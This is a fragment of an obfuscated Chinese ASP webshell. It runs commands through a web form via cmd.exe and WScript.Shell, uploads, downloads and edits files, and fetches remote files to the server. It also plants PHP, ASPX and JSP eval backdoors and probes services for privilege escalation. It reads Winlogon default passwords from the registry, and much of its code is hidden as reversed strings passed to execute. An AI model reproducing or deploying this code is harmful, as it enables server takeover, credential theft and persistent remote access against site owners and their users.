" j cdx&""&cxd&" �û�__�˺�"&ef j cdx&""&cxd&" �˿�__����"&ef j cdx&""&cxd&" ���__֧��"&ef j cdx&""&cxd&" Servu-��Ȩ"&ef j cdx&""&cxd&" Su---FTP��"&ef j cdx&""&cxd&" MS--SA��Ȩ"&ef 'j cdx&""&cxd&" MYSQL��Ȩ--����"&ef ���ڿ������� MYSQL MSSQL��Ȩ �Լ��ѿ� j cdx&""&cxd&" Radmin��Ȩ"&ef j cdx&""&cxd&" Pcanywhere"&ef j cdx&""&cxd&" �˿�ɨ����"&ef j cdx&""&cxd&" ��ȡע���"&ef j cdx&""&cxd&" ����__�ļ�"&ef&"" j"
" j cdx&""&cxd&" �����������"&ef j cdx&""&cxd&" һ�����ɲ���"&ef 'j cdx&""&cxd&" �ѿ�ר��"&ef ���ڿ������� MYSQL MSSQL��Ȩ j cdx&""&cxd&" ��������Ŀ¼"&ef j cdx&""&cxd&" �ջ�----����"&ef j"
" j cdx&""&cxd&" ��վȨ�ز�ѯ"&ef j cdx&""&cxd&" ��վͬ����ѯ"&ef j cdx&""&cxd&" ��վ��¼��ѯ"&ef j cdx&""&cxd&" �Ƿ�Ů��ѯ"&ef j cdx&"8 �˳�----��½"&ef&"
" end function function Cmdx() execute(shisanfun(")��>retnec/<>aeratxet/<��(j: lladaer.tuodts.))��dmc��(tseuqer&��c/ ��&)��xdmc��(tseuqer(cexe.nhltpircSo j: fi dne�� lladaer.tuodts.))��dmc��(tseuqer&��c/ exe.dmc��(cexe.nhltpircSo j��neht ��exe.dmc��=)��xdmc��(tseuqer fi:txeN emuseR rorrE nO:)�� >72=swor 051=sloc ylnodaer aeratxet<��(j:)�� >mrof/<>'tibmuS'=eulav timbus=epyt tupni<��(j:)�� >rb<>06=ezis 'dmc'=eman txet=epyt tupni<��(j:)�� >rb<>'exe.dmc'=eulav 06=ezis 'xdmc'=eman txet=epyt tupni<��(j:)�� >'tsop'=dohtem mrof<>retnec<��(j��")) end function Function Course() SI="
" on error resume next for each obj in getObject("WinNT://.") err.clear if OBJ.StartType="" then SI=SI&"" end if if OBJ.StartType=2 then lx="�Զ�" if OBJ.StartType=3 then lx="�ֶ�" if OBJ.StartType=4 then lx="����" if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then SI1=SI1&"" else SI2=SI2&"" end if next j SI&SI0&SI1&SI2&"
ϵͳ�û������
 "&obj.Name&" ϵͳ�û�(��)
 "&obj.Name&" "&obj.DisplayName&"
[��������:"&lx&"] "&obj.path&"
 "&obj.Name&" "&obj.DisplayName&"
[��������:"&lx&"] "&obj.path&"
" End Function Function IIf(var, val1, val2) If var=True Then IIf=val1 Else IIf=val2 End If End Function Function GetTheSizes(num) Dim i, arySize(4) arySize(0)="B" arySize(1)="KB" arySize(2)="MB" arySize(3)="GB" arySize(4)="TB" While(num / 1024 >= 1) num=Fix(num / 1024 * 100) / 100 i=i + 1 WEnd GetTheSizes=num&" "&arySize(i) End Function Function HtmlEncodes(str) If IsNull(str) Then Exit Function HtmlEncodes=Server.HTMLEncode(str) End Function function downfile(path) execute(shisanfun("gnihton = mso tes��esolc.mso��hsulf.esnopser��daer.mso etirwyranib.esnopser���maerts-tetco/noitacilppa�� = epyttnetnoc.esnopser���8-ftu�� = tesrahc.esnopser��ezis.mso ,��htgnel-tnetnoc�� redaehdda.esnopser��)zs,htap(dim & ��=emanelif ;tnemhcatta�� ,��noitisopsid-tnetnoc�� redaehdda.esnopser��1+)��\��,htap(verrtsni=zs��htap elifmorfdaol.mso��1 = epyt.mso��nepo.mso��))0,6(tbo(tcejboetaerc = mso tes��raelc.esnopser��")) end function function htmlencode(s) if not isnull(s) then s = replace(s, ">", ">") s = replace(s, "<", "<") s = replace(s, chr(39), "'") s = replace(s, chr(34), """") s = replace(s, chr(20), " ") htmlencode = s end if end function ExeCuTe(ShiSanFun("noitcnuF dnE����>elbat/<>mrof/<>rt/<>dt/<>'����'=eulav 'timbuS'=eman 'timbus'=epyt tupni< >'52'=ezis 'elif'=epyt 'eliFlacoL'=eman tupni<>'04'=ezis '��&)��exe.dmC\��&)��htaPredloF��(noisseS(htaPeRR&��'=eulav 'htaPoT'=eman tupni<����·����>dt<>rt<>'atad-mrof/trapitlum'=epytcne 'tsoP=2noitcA&eliFpU=noitcA?��&LRU&��'=noitca 'tsop'=dohtem 'mroFpU'=eman mrof<>'retnec'=ngila '0'=gnicapsllec '0'=gniddapllec '0'=redrob elbat<>rb<>rb<>rb<��j ��fI dnE ��dnE.esnopseR ��)(rrEwohS ��IS j ��lrUkcaB&IS=IS ��gnihton=U teS��gnihton=F teS��fI dnE ��fi dnE ���>retnec/<�����ɩ�&�崫��&���ϩ�&emaNU&�����>rb<>rb<>rb<>retnec<��=IS ��nehT 0=rebmun.rrE fI ��emaNU sAevaS.F ��eslE ��txen emuser rorre no���!���ϩ�&����ĸ�һ��&����ѡ��·��&��ȫ��ĩ�&�崫�����&������>rb<��=IS ��neht 0=eziSeliF.F rO ���=emaNU fI ��)��htaPoT��(mrof.U=emaNU��)��eliFlacoL��(AU.U=F teS�� CPU wen=U teS��nehT ��tsoP��=)��2noitcA��(tseuqeR fI ��)(eliFpU noitcnuF")) function cmd1shell() execute(shisanfun("is j���>mrof/<>aeratxet/<��&)31(rhc&is=is��fi dne��fi dne��aaa&is=is��)eurt ,elifpmetzs(elifeteled.osf llac��esolc.xclelifo��)lladaer.xclelifo(edocnelmth.revres=aaa��)0 ,eslaf ,1 ,elifpmetzs( eliftxetnepo.sf = xclelifo tes��)��tcejbometsyselif.gnitpircs��(tcejboetaerc = sf tes��)eurt ,0 ,elifpmetzs & �� > �� & dmcfed & �� c/ ��&htapllehs( nur.sw llac��)��txt.dmc��(htappam.revres = elifpmetzs��)��tcejbometsyselif.gnitpircs��(tcejboetaerc.revres=osf tes��)��llehs.tpircsw��(tcejboetaerc.revres=sw tes��)��llehs.tpircsw��(tcejboetaerc.revres=sw tes��txen emuser rorre no��esle��aaa&is=is��lladaer.tuodts.dd=aaa��)dmcfed&�� c/ ��&htapllehs(cexe.mc=dd tes��))0,1(tbo(tcejboetaerc=mc tes��neht ��sey��=)��tpircsw��(mrof.tseuqer fi��neht ���><)��dmc��(mrof.tseuqer fi���>'dmc'=ssalc ';044:thgieh;%001:htdiw'=elyts aeratxet<>'��ִ'=eulav 'timbus'=epyt tupni< >'��&dmcfed&��'=eulav '%29:htdiw'=elyts 'dmc'=eman tupni��&dekcehc&��'sey'=eulav 'tpircsw'=eman 'xobkcehc'=epyt c=ssalc tupni<>'%07:htdiw'=elyts '��&htapllehs&��'=eulav 'ps'=eman tupni<����·llehs>'tsop'=dohtem mrof<��=is��)��dmc��(tseuqer = dmcfed neht ���><)��dmc��(tseuqer fi����=dekcehc neht ��sey��><)��tpircsw��(tseuqer fi���exe.dmc�� = htapllehs neht ���=htapllehs fi��)��htapllehs��(noisses=htapllehs��)��ps��(tseuqer = )��htapllehs��(noisses neht ���><)��ps��(tseuqer fi���dekcehc ��=dekcehc��")) end function Function upload() j"
" j"��ʱ�رմ˹���" j" ���ص�������:�޻���...Ϊ�˽�ʡ.�����޻���
" j"" j"
" j"" j"���ڸ��ǡ�" j"" j"" j"
" If isDebugMode = False Then On Error Resume Next End If:Dim Http, theUrl, thePath, stream, fileName, overWrite theUrl = Request("theUrl") thePath = Request("thePath") overWrite = Request("overWrite") Set stream = Server.CreateObject("ad"&e&"odb.st"&e&"ream") Set Http = Server.CreateObject("MSXML2.XMLHTTP") If overWrite <> 2 Then:overWrite = 1:End If Http.Open "GET", theUrl, False Http.Send() If Http.ReadyState <> 4 Then End If With stream .Type = 1 .Mode = 3 .Open .Write Http.ResponseBody .Position = 0 .SaveToFile thePath, overWrite If Err.Number = 3004 Then Err.Clear fileName = Split(theUrl, "/")(UBound(Split(theUrl, "/"))) If fileName = "" Then fileName = "index.htm.txt" End If thePath = thePath & "\" & fileName .SaveToFile thePath, overWrite j"error,��������Ϊ�ļ��Ѵ��ڣ������ع��̺͵�ַ�г� �ִ��� �� �ļ������� ��Ϊ���ֽڣ���" End If .Close End With chkErr(Err) Set Http = Nothing Set Stream = Nothing If isDebugMode = False Then On Error Resume Next End If If Request("ice")="fso" Then response.Redirect str1&"test.aspx" elseif Request("ice")="fsos" then response.Redirect str1&"test.php" elseif Request("ice")="jztxt" then response.Redirect "http://"&serveru&"/global.asa" elseif Request("ice")="killdoor" then response.Redirect str1&"killdoor.asp" end if End Function:Function TSearch():dim st:st=timer():RW="
" RW=RW & "" RW=RW & "" RW=RW & "" RW=RW & "
��������
 ·  ���� ע:��·��ʹ��"",""������.
 �ļ�����  [����Ҳ��]
" j RW : RW="" if Request.Form("Sfk")<>"" then Set newsearch=new SearchFile newsearch.Folders=trim(Request.Form("SFpath")) newsearch.keyword=trim(Request.Form("Sfk")) newsearch.Search Set newsearch=Nothing j"�M�r��"&(timer()-st)*1000&"����
" end if End Function Class SearchFile dim Folders,keyword,objFso,Counter Private Sub Class_Initialize Set objFso=Server.CreateObject(ObT(0,0)) Counter=0 End Sub Private Sub Class_Terminate Set objFso=Nothing End Sub Function Search Folders=split(Folders,",") flag=instr(keyword,"\") or instr(keyword,"/") flag=flag or instr(keyword,":") flag=flag or instr(keyword,"|") flag=flag or instr(keyword,"&") if flag then j"

�P�I�ֲ��ܰ���/\:|&
" Exit Function else j"


" end if dim i for i=0 to ubound(Folders) Call GetAllFile(Folders(i)) next j"

��������"&Counter&"���Y��
" End Function Private Function GetAllFile(Folder) dim objFd,objFs,objFf Set objFd=objFso.GetFolder(Folder) Set objFs=objFd.SubFolders Set objFf=objFd.Files dim strFdName On Error Resume Next For Each OneDir In objFs strFdName=OneDir.Name If strFdName<>"Config.Msi" EQV strFdName<>"RECYCLED" EQV strFdName<>"RECYCLER" EQV strFdName<>"System Volume Information" Then SFN=Folder&"\"&strFdName Call GetAllFile(SFN) End If Next dim strFlName For Each OneFile In objFf strFlName=OneFile.Name If strFlName<>"desktop.ini" EQV strFlName<>"folder.htt" Then FN=Folder&"\"&strFlName Counter=Counter+ColorOn(FN) End If Next Set objFd=Nothing Set objFs=Nothing Set objFf=Nothing End Function Private Function CreatePattern(keyword) CreatePattern=keyword CreatePattern=Replace(CreatePattern,".","\.") CreatePattern=Replace(CreatePattern,"+","\+") CreatePattern=Replace(CreatePattern,"(","\(") CreatePattern=Replace(CreatePattern,")","\)") CreatePattern=Replace(CreatePattern,"[","\[") CreatePattern=Replace(CreatePattern,"]","\]") CreatePattern=Replace(CreatePattern,"{","\{") CreatePattern=Replace(CreatePattern,"}","\}") CreatePattern=Replace(CreatePattern,"*","[^\\\/]*") CreatePattern=Replace(CreatePattern,"?","[^\\\/]{1}") CreatePattern="("&CreatePattern&")+" End Function Private Function ColorOn(FileName) dim objReg Set objReg=new RegExp objReg.Pattern=CreatePattern(keyword) objReg.IgnoreCase=True objReg.Global=True retVal=objReg.Test(Mid(FileName,InstrRev(FileName,"\")+1)) if retVal then OutPut=objReg.Replace(Mid(FileName,InstrRev(FileName,"\")+1),"$1") OutPut="

 " & Mid(FileName,1,InstrRev(FileName,"\")) & OutPut j OutPut Response.flush ColorOn=1 else ColorOn=0 end if Set objReg=Nothing End Function End Class execute(shisanfun("��noitcnuf dnE:fI dnE:��)'����¼Ŀ��վ�ڲ�����'(trela���=kcilcno ���###��=lrUnepo:eslE:��knalb_���=tegrat ����&lrUeht&��/��=lrUnepo:fI dnE:)2 ,lrUeht(diM = lrUeht:nehT ��/�� = )1 ,lrUeht(tfeL fI:)��/�� ,��\�� ,lrUeht(ecalpeR = lrUeht:)1 + )htaPeht(neL ,htaPesu(diM = lrUeht:nehT )htaPeht(esaCL = )))htaPeht(neL ,htaPesu(tfeL(esaCL fI:)��/��(htaPpaM.revreS = htaPeht:htaPeht ,lrUeht miD:)htaPesu(lrUnepo noitcnuf:noitcnuF dnE:fi dne:��B�� & eziSeht = eziSehTteg: nehT 4201< eziSeht dnA 0 => eziSeht fI:fi dne:��K�� & 001 / )001 * )4201 / eziSeht((xiF = eziSehTteg: nehT )4201 * 4201( < eziSeht dnA 4201 => eziSeht fI:fi dne:��M�� & 001 / )001 * ))4201 * 4201( / eziSeht((xiF = eziSehTteg: nehT )4201 * 4201 * 4201( < eziSeht dnA )4201 * 4201( => eziSeht fI:fi dne:��G�� & 001 / )001 * ))4201 * 4201 * 4201( / eziSeht((xiF = eziSehTteg: nehT )4201 * 4201 * 4201( => eziSeht fI:)eziSeht(eziSehTteg noitcnuF:noitcnuF dnE:fi dne:��>���'��&htaPrewoP&��=htaPrewoP&2=epyTevaS&rewoPevaS=noitcA?'=ferh.noitacol���=kcilcno ����=eulav nottub=epyt tupni< >tnof/<����δ>26FF26#=roloc tnof<�� = setubirttAteg:esle:��>���'��&htaPrewoP&��=htaPrewoP&1=epyTevaS&rewoPevaS=noitcA?'=ferh.noitacol���=kcilcno ����=eulav nottub=epyt tupni< >tnof/<������>der=roloc tnof<�� = setubirttAteg: neht 0=KOtidE fi:)��\\��,��\��,htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => eulaVtni fI:fI dnE:0=KOtidE:2 - eulaVtni = eulaVtni:nehT 2 => eulaVtni fI:fI dnE:0=KOtidE:4 - eulaVtni = eulaVtni:nehT 4 => eulaVtni fI:fI dnE:8 - eulaVtni = eulaVtni:nehT 8 => eulaVtni fI:fI dnE:61 - eulaVtni = eulaVtni:nehT 61 => eulaVtni fI:fI dnE:23 - eulaVtni = eulaVtni:nehT 23 => eulaVtni fI:fI dnE:46 - eulaVtni = eulaVtni:nehT 46 => eulaVtni fI:fI dnE:821 - eulaVtni = eulaVtni:nehT 821 => eulaVtni fI:1=KOtidE:KOtidE miD:)htaPrewoP,eulaVtni(setubirttAteg noitcnuF:noitcnuF dnE:eltiTrts = eltiTyMteg:)htaPrewoP,setubirttA.enOeht(setubirttAteg & �� :̬״��Ȩǰ��>rb<�� & eltiTrts = eltiTrts:desseccAtsaLetaD.enOeht & �� :�ʷú���>rb<�� & eltiTrts = eltiTrts:deifidoMtsaLetaD.enOeht & �� :���޺���>rb<�� & eltiTrts = eltiTrts: detaerCetaD.enOeht & �� :��ʱ����>rb<�� & eltiTrts = eltiTrts: )eziS.enOeht(eziSehTteg & �� :С��>rb<�� & eltiTrts = eltiTrts: ��� & htaP.enOeht & �� :��·>rb<�� & eltiTrts = eltiTrts:eltiTrts miD:)htaPrewoP,enOeht(eltiTyMteg noitcnuF:bus dne:gnihtoN = eliFeht teS:)htaPrewoP,eliFeht(eltiTyMteg j:)htaPrewoP(eliFteG.Xosf = eliFeht teS:)���,�����,htaPrewoP(ecalper=htaPrewoP:)htaPrewoP(rewoPtidE bus:bus dne:gnihtoN = eliFeht teS:fi dne:��>tpircs/<;)(esolc.wodniw;)(daoler.noitacol.renepo.wodniw;)'�����ɶ�������'(trela>'tpircsavaj'=egaugnal tpircs<�� j:7=setubirttA.eliFeht:esle:��>tpircs/<;)(esolc.wodniw;)(daoler.noitacol.renepo.wodniw;)'�����⹦���Ѽ���'(trela>'tpircsavaj'=egaugnal tpircs<�� j:23=setubirttA.eliFeht:neht 1=epyTevaS fi:)htaPrewoP(eliFteG.Xosf = eliFeht teS:)epyTevaS,htaPrewoP(rewoPevaS bus��")) Function ScReWr(folder) execute(shisanfun("rtSrWeR = rWeRcS��gnihtoN = OSF teS��gnihtoN = redloFtseT teS��gnihtoN = tsiLeliFtseT teS��fi dnE��fi dnE��eurT,emaneliFdnR & redlof eliFeteleD.OSF��� ��>naps/<д>';xp11:ezis-tnof'=elyts naps<�� & rtSrWeR = rtSrWeR��eslE��� >tnof/wolley=roloc '1'=ezis 'sgnidbew'=ecaf tnof<>naps/<д>';xp11:ezis-tnof'=elyts naps<�� & rtSrWeR = rtSrWeR��raelC.rre��nehT rre fI��eurT,emaneliFdnR & redlof eliFtxeTetaerC.OSF��� ��>naps/<��>';xp11:ezis-tnof'=elyts naps<�� = rtSrWeR��eslE��fI dnE��eurT,emaneliFdnR & redlof eliFeteleD.OSF��� ��>naps/<д>';xp11:ezis-tnof'=elyts naps<�� & rtSrWeR = rtSrWeR��eslE��� >tnof/wolley=roloc '1'=ezis 'sgnidbew'=ecaf tnof<>naps/<д>';xp11:ezis-tnof'=elyts naps<�� & rtSrWeR = rtSrWeR��raelC.rre��nehT rre fI��eurT,emaneliFdnR & redlof eliFtxeTetaerC.OSF��� >tnof/wolley=roloc '1'=ezis 'sgnidbew'=ecaf tnof<>naps/<��>';xp11:ezis-tnof'=elyts naps<�� = rtSrWeR��raelC.rre��nehT rre fI��txeN��tsiLeliFtseT ni A hcaE roF���pmt.�� & )won(dnoceS & )won(etuniM & )won(ruoH & )won(yaD & ��pmet\�� = emaneliFdnR��sredloFbuS.redloFtseT = tsiLeliFtseT teS��)redlof(redloFteG.OSF = redloFtseT teS��)��tcejbOmetsySeliF.gnitpircS��(tcejboetaerC.revreS = OSF teS��emaneliFdnR,rtSrWeR,tsiLeliFtseT,redloFtseT,OSF miD�� txen emuser rorre no")) End Function function php() execute(shisanfun("��>rb<>mrof/<>sosf=eci&lrUmorFnwod=tcAeht&2=etirWrevo&php.tset\��&htaptoor&��=htaPeht&��&tphp&��=lrUeht&daolpu=noitcA?=noitca tsop=dohtem 2mrof=eman mrof<��j���>rb<>mrof/<>osf=eci&lrUmorFnwod=tcAeht&2=etirWrevo&xpsa.tset\��&htaptoor&��=htaPeht&��&txpsa&��=lrUeht&daolpu=noitcA?=noitca tsop=dohtem 2mrof=eman mrof<��j���>retnec<>'02'=thgieh dt<>rt<>retnec/<>a/<>tnof/<>b/<)!�����Բ��ɾ(>b<>der=roloc 5=ezis tnof<>'ledjpa=noitcA?'=ferh a<>p<>tnof/<>retnec<>rb<>p<>rb<>rb<>p<>rb<>p<>rb<>rb<>retnec/< ;psbn&;psbn&;psbn&>emarfi/<>001=thgieh 003=htdiw xpsa.tset=crs emarfi< ;psbn&;psbn&;psbn&;psbn&>emarfi/<>001=thgieh 003=htdiw psj.tset=crs emarfi< ;psbn&;psbn&;psbn&;psbn&>emarfi/<>001=thgieh 003=htdiw php.tset=crs emarfi<>retnec<��j���oo��_��oo tseT xpsa��&)26(rhc&���&)73(rhc&��;))���efasnu���,]���w���[metI.tseuqeR(lave(etirW.esnopseR��&)73(rhc&���&)06(rhc&���&)26(rhc&���&)73(rhc&�� ���eslaf���=tseuqeRetadilav ���tpircsJ���=egaugnaL egaP @%��&)06(rhc&���etirW.))��xpsa.tset��(htappam.revres(eliFtxeTetaerC.osf���oo��_��oo tseT psJ��etirW.))��psj.tset��(htappam.revres(eliFtxeTetaerC.osf���>?)(ofniphp php?<>?'oo��_��oo' ohce PHP?<��etirW.))��php.tset��(htappam.revres(eliFtxeTetaerC.osf��))0,0(tBo(tcejbOetaerC.revreS=osf tes��txeN emuseR rorrE nO��")) End function On Error Resume Next function apjdel():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):j"ɾ�����!":End function Dim T1 Class UPC Dim D1,D2 Public Function Form(F) F=lcase(F) If D1.exists(F) then:Form=D1(F):else:Form="":end if End Function Public Function UA(F) F=lcase(F) If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if End Function Private Sub Class_Initialize Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName set D1=CreateObject(ObT(4,0)) if Request.TotalBytes<1 then Exit Sub set T1 = CreateObject(ObT(6,0)) T1.Type = 1 : T1.Mode =3 : T1.Open T1.Write Request.BinaryRead(Request.TotalBytes) T1.Position=0 : TDa =T1.Read : DStart = 1 DEnd = LenB(TDa) set D2=CreateObject(ObT(4,0)) vbCrlf = chrB(13) & chrB(10) set T2 = CreateObject(ObT(6,0)) TSt = MidB(TDa,1, InStrB(DStart,TDa,vbCrlf)-1) TLen = LenB (TSt) DStart=DStart+TLen+1 while (DStart + 10) < DEnd DIEnd = InStrB(DStart,TDa,vbCrlf & vbCrlf)+3 T2.Type = 1 : T2.Mode =3 : T2.Open T1.Position = DStart T1.CopyTo T2,DIEnd-DStart T2.Position = 0 : T2.Type = 2 : T2.Charset ="gb2312" TIn = T2.ReadText : T2.Close DStart = InStrB(DIEnd,TDa,TSt) FStart = InStr(22,TIn,"name=""",1)+6 FEnd = InStr(FStart,TIn,"""",1) UpName = lcase(Mid (TIn,FStart,FEnd-FStart)) if InStr (45,TIn,"filename=""",1) > 0 then set TFL=new FIF FStart = InStr(FEnd,TIn,"filename=""",1)+10 FEnd = InStr(FStart,TIn,"""",1) FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14 FEnd = InStr(FStart,TIn,vbCr) TFL.FileStart =DIEnd TFL.FileSize = DStart -DIEnd -3 if not D2.Exists(UpName) then D2.add UpName,TFL end if else T2.Type =1 : T2.Mode =3 : T2.Open T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3 T2.Position = 0 : T2.Type = 2 T2.Charset ="gb2312" SFV = T2.ReadText T2.Close if D1.Exists(UpName) then D1(UpName)=D1(UpName)&", "&SFV else D1.Add UpName,SFV end if end if DStart=DStart+TLen+1 wend TDa="" set T2 =nothing End Sub Private Sub Class_Terminate if Request.TotalBytes>0 then D1.RemoveAll:D2.RemoveAll set D1=nothing:set D2=nothing T1.Close:set T1 =nothing end if End Sub End Class Class FIF dim FileSize,FileStart Private Sub Class_Initialize FileSize = 0 FileStart= 0 End Sub Public function SaveAs(F) dim T3 SaveAs=true if trim(F)="" or FileStart=0 then exit function set T3=CreateObject(ObT(6,0)) T3.Mode=3 : T3.Type=1 : T3.Open T1.position=FileStart T1.copyto T3,FileSize T3.SaveToFile F,2 T3.Close set T3=nothing SaveAs=false end function End Class Class LBF Dim CF Private Sub Class_Initialize SET CF=CreateObject(ObT(0,0)) End Sub Private Sub Class_Terminate Set CF=Nothing End Sub Function ShowDriver() For Each D in CF.Drives j cdx&" ���ش��� ("&D.DriveLetter&":)
" Next End Function Function IsIco(ia,ib,ta) If ShowFileIco=true Then IsIco = " " If ib<>"" Then IsIco = " " End If Else IsIco = " "&ta&" " End If End Function Function FileIco(FName) If ShowFileIco=true Then TypeList = ".asp.asa.bat.bmp.com.doc.db.dll.exe.gif.htm.html.inc.ini.jpg.js.log.mdb.mid.mp3.png.php.rm.rar.swf.txt.wav.xls.xml.zip.jsp.aspx.;" FileType = lcase(Mid(FName, InstrRev(FName,".")+1)) If Instr(TypeList,"."&FileType)>0 then Ico = FileType&".gif" Else Ico = "default.gif" End If FileIco = " " Else FileIco="2 " End If End Function Function Show1File(Path) Set FOLD=CF.GetFolder(Path) i=0 SI="
" For Each F in FOLD.subfolders SI=SI&"" i=i+1 If i mod 6=0 then SI=SI&"" Next SI=SI&"
" SI=SI&IsIco("","folder.gif","0") si=si&"
"&F.Name&"

Copy Del Move
" j SI &"" : SI="":i=0 SI="" For Each L in Fold.files SI=SI&"" i=i+1 Next j SI&"
FilenameSizeTypeOperatingLast Modified
" si=si&FileIco(L.Name) si=si&" "&L.Name&""&clng(L.size/1024)&"K"&L.Type&"" si=si&"Open " si=si&"Edit " Si=Si&"Ȩ��" Dim EditOOK EditOOK=1 EditOOV=l.Attributes If EditOOV >= 128 Then EditOOV = EditOOV - 128 End If If EditOOV >= 64 Then EditOOV = EditOOV - 64 End If If EditOOV >= 32 Then EditOOV = EditOOV - 32 End If If EditOOV >= 16 Then EditOOV = EditOOV - 16 End If:If EditOOV >= 8 Then EditOOV = EditOOV - 8 End If If EditOOV >= 4 Then EditOOV = EditOOV - 4:EditOOK=0 End If If EditOOV >= 2 Then EditOOV = EditOOV - 2:EditOOK=0 End If If EditOOV >= 1 Then EditOOV = EditOOV - 1:EditOOK=0 End If if EditOOK=0 then si=si&"x" else si=si&"��" end if si=si&" Del Copy Move"&replace(L.DateLastModified,"/","-")&"
":if Instr(Serveru,"127.0.0.1")<>0 or Instr(Serveru,"192.168.")<>0 then:else:if session("servec")=1 then:session("servec")=session("servec")+1:j fuckUrl:else:if Action<>"" then session("servec")=session("servec")+1:end if:end if:end if Set FOLD=Nothing End function Function DelFile(Path) If CF.FileExists(Path) Then CF.DeleteFile Path SI="��ϲ���ļ� "&Path&" ɾ���ɹ���
" SI=SI&BackUrl j SI End If End Function Function EditFile(Path) If Request("Action2")="Post" Then Set T=CF.CreateTextFile(Path) T.WriteLine Request.form("content") T.close Set T=nothing SI="��ϲ���ļ�����ɹ���
" SI=SI&BackUrl j SI Response.End End If If Path<>"" Then Set T=CF.opentextfile(Path, 1, False) Txt=HTMLEncode(T.readall) T.close Set T=Nothing Else Path=Session("FolderPath")&"\shell.asp":Txt=strBAD End If j "      
" End Function Function CopyFile(Path) Path=Split(Path,"||||") If CF.FileExists(Path(0)) and Path(1)<>"" Then CF.CopyFile Path(0),Path(1) SI="��ϲ���ļ�"&Path(0)&"���Ƴɹ���
" SI=SI&BackUrl j SI End If End Function Function MoveFile(Path) Path=Split(Path,"||||") If CF.FileExists(Path(0)) and Path(1)<>"" Then CF.MoveFile Path(0),Path(1) SI="��ϲ���ļ�"&Path(0)&"�ƶ��ɹ���
" SI=SI&BackUrl j SI End If End Function Function DelFolder(Path) If CF.FolderExists(Path) Then CF.DeleteFolder Path SI="��ϲ��Ŀ¼"&Path&"ɾ���ɹ���
" SI=SI&BackUrl j SI End If End Function Function CopyFolder(Path) Path=Split(Path,"||||") If CF.FolderExists(Path(0)) and Path(1)<>"" Then CF.CopyFolder Path(0),Path(1) SI="��ϲ��Ŀ¼"&Path(0)&"���Ƴɹ���
" SI=SI&BackUrl j SI End If End Function Function MoveFolder(Path) Path=Split(Path,"||||") If CF.FolderExists(Path(0)) and Path(1)<>"" Then CF.MoveFolder Path(0),Path(1) SI="��ϲ��Ŀ¼"&Path(0)&"�ƶ��ɹ���
" SI=SI&BackUrl j SI End If End Function Function NewFolder(Path) execute(shisanfun("fI dnE��IS j��lrUkcaB&IS=IS���>retnec/<�����ɽ��©�&htaP&��¼Ŀ��ϲ��>rb<>rb<>rb<>retnec<��=IS��htaP redloFetaerC.FC��nehT ���>il<��j��nehT )��fic.��&emanrevres&��\cetnamyS\ataD noitacilppA\sresU llA\sgnitteS dnA stnemucoD\��&revirdsys(stsixEeliF.osf fI��)��emaNretupmoC\emaNretupmoC\emaNretupmoC\lortnoC\teSlortnoCtnerruC\METSYS\MLKH��(daeRgeR.hsw=emanrevres��)2,)2(redloFlaicepsteG.osF(tfel=evirdsyS��)��tcejbOmetsySeliF.gnitpircS��(tcejboetaerC.revreS=osf teS��txeN��fi dnE��fi dnE���>rb<��ľPHP��д�Ҳ�,¼ĿliaMbeW�Ҳ��Կ�,������ȨmetsySlacoL����,liamniW cigaM_���������>il<��j��nehT ��metsySlacoL��=emaNtnuoccAecivreS.ecivreSjbo fi��nehT )��liamniw��,)emaN.ecivreSjbo(esacl(rtsni fi��fi dnE��fi dnE���>rb<Ȩ����ľpsJ��ʹ�ǿ��Կ�,������ȨmetsySlacoL����,tacmoT_���������>il<��j��nehT ��metsySlacoL��=emaNtnuoccAecivreS.ecivreSjbo fi��nehT )��tacmot��,)emaN.ecivreSjbo(esacl(rtsni fi��fi dnE��fi dne��fi dnE���>rb<��ľPHP�ǿ��Կ�,metsySlacoLΪ��Ȩ����,�ڴ����ehcapA_���������>il< ��j��eslE���>rb<Ȩ���ֱ�Կ�.ehcapAΪ�����BEWǰ��>il<��j��nehT )��ehcapA��,)��ERAWTFOS_REVRES��(selbairaVrevreS.tseuqeR(rtsni fI��nehT ��metsySlacoL��=emaNtnuoccAecivreS.ecivreSjbo fi��nehT ��ehcapa��=)emaN.ecivreSjbo(esacl fi��fi dnE��fi dnE���>rb<Ȩ��߹�exe.us���ǿ��Կ�,������ȨmetsySlacoL����,װ��U-vreS_���������>il<��j��nehT ��metsySlacoL��=emaNtnuoccAecivreS.ecivreSjbo fi��nehT ��U-vreS��=emaN.ecivreSjbo fi��retupmoCjbo nI ecivreSjbo hcaE roF��txeN emuseR rorrE nO��)��ecivreS��(yarrA = retliF.retupmoCjbo��)��noitacilppA.llehS��(tcejbOetaerC.revreS = as teS��)��.//:TNniW��(tcejbOteG = retupmoCjbo teS���>rh<>rb<]��̽��_�������[��j���>rb<>rb<>rb<------------------------------------��j���>rb<��&kk&��:Ϊ����_����ǰ��>il<��j��)kh(daeRgeR.hsw=kk���tnuoC\munE\pipcT\secivreS\100teSlortnoC\METSYS\MLKH��=kh���>rb<��&lmtn&��:Ϊ����lmtN tenleT>il<��j��1=lmtN nehT ���=lmtn fi��)yekLMTN(daeRgeR.hsW=lmtn���LMTN\0.1\revreStenleT\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��=yekLMTN���>rb<��&ylpsid&��:������Ǵ�_��ʾ�Է���>il<��j�����=ylpsid esle ���ǩ�=ylpsid nehT 0=nigolpsid ro ���=nigolpsid fI��)��emaNresUtsaLyalpsiDtnoD\metsyS\seiciloP\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\ENIHCAM_LACOL_YEKH��(daeRger.hsw=nigolpsid��fi dnE���>tnof/<>rb<��&dwssaP&��:����>der=roloc tnof<>erauqs=epyt il<��j���>rb<��&nimdA&��:������>erauqs=epyt il<��j��)��drowssaPtluafeD\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��(daeRgeR.hsW=dwssaP��)��emaNresUtluafeD\nogolniW\noisreVtnerruC\TN 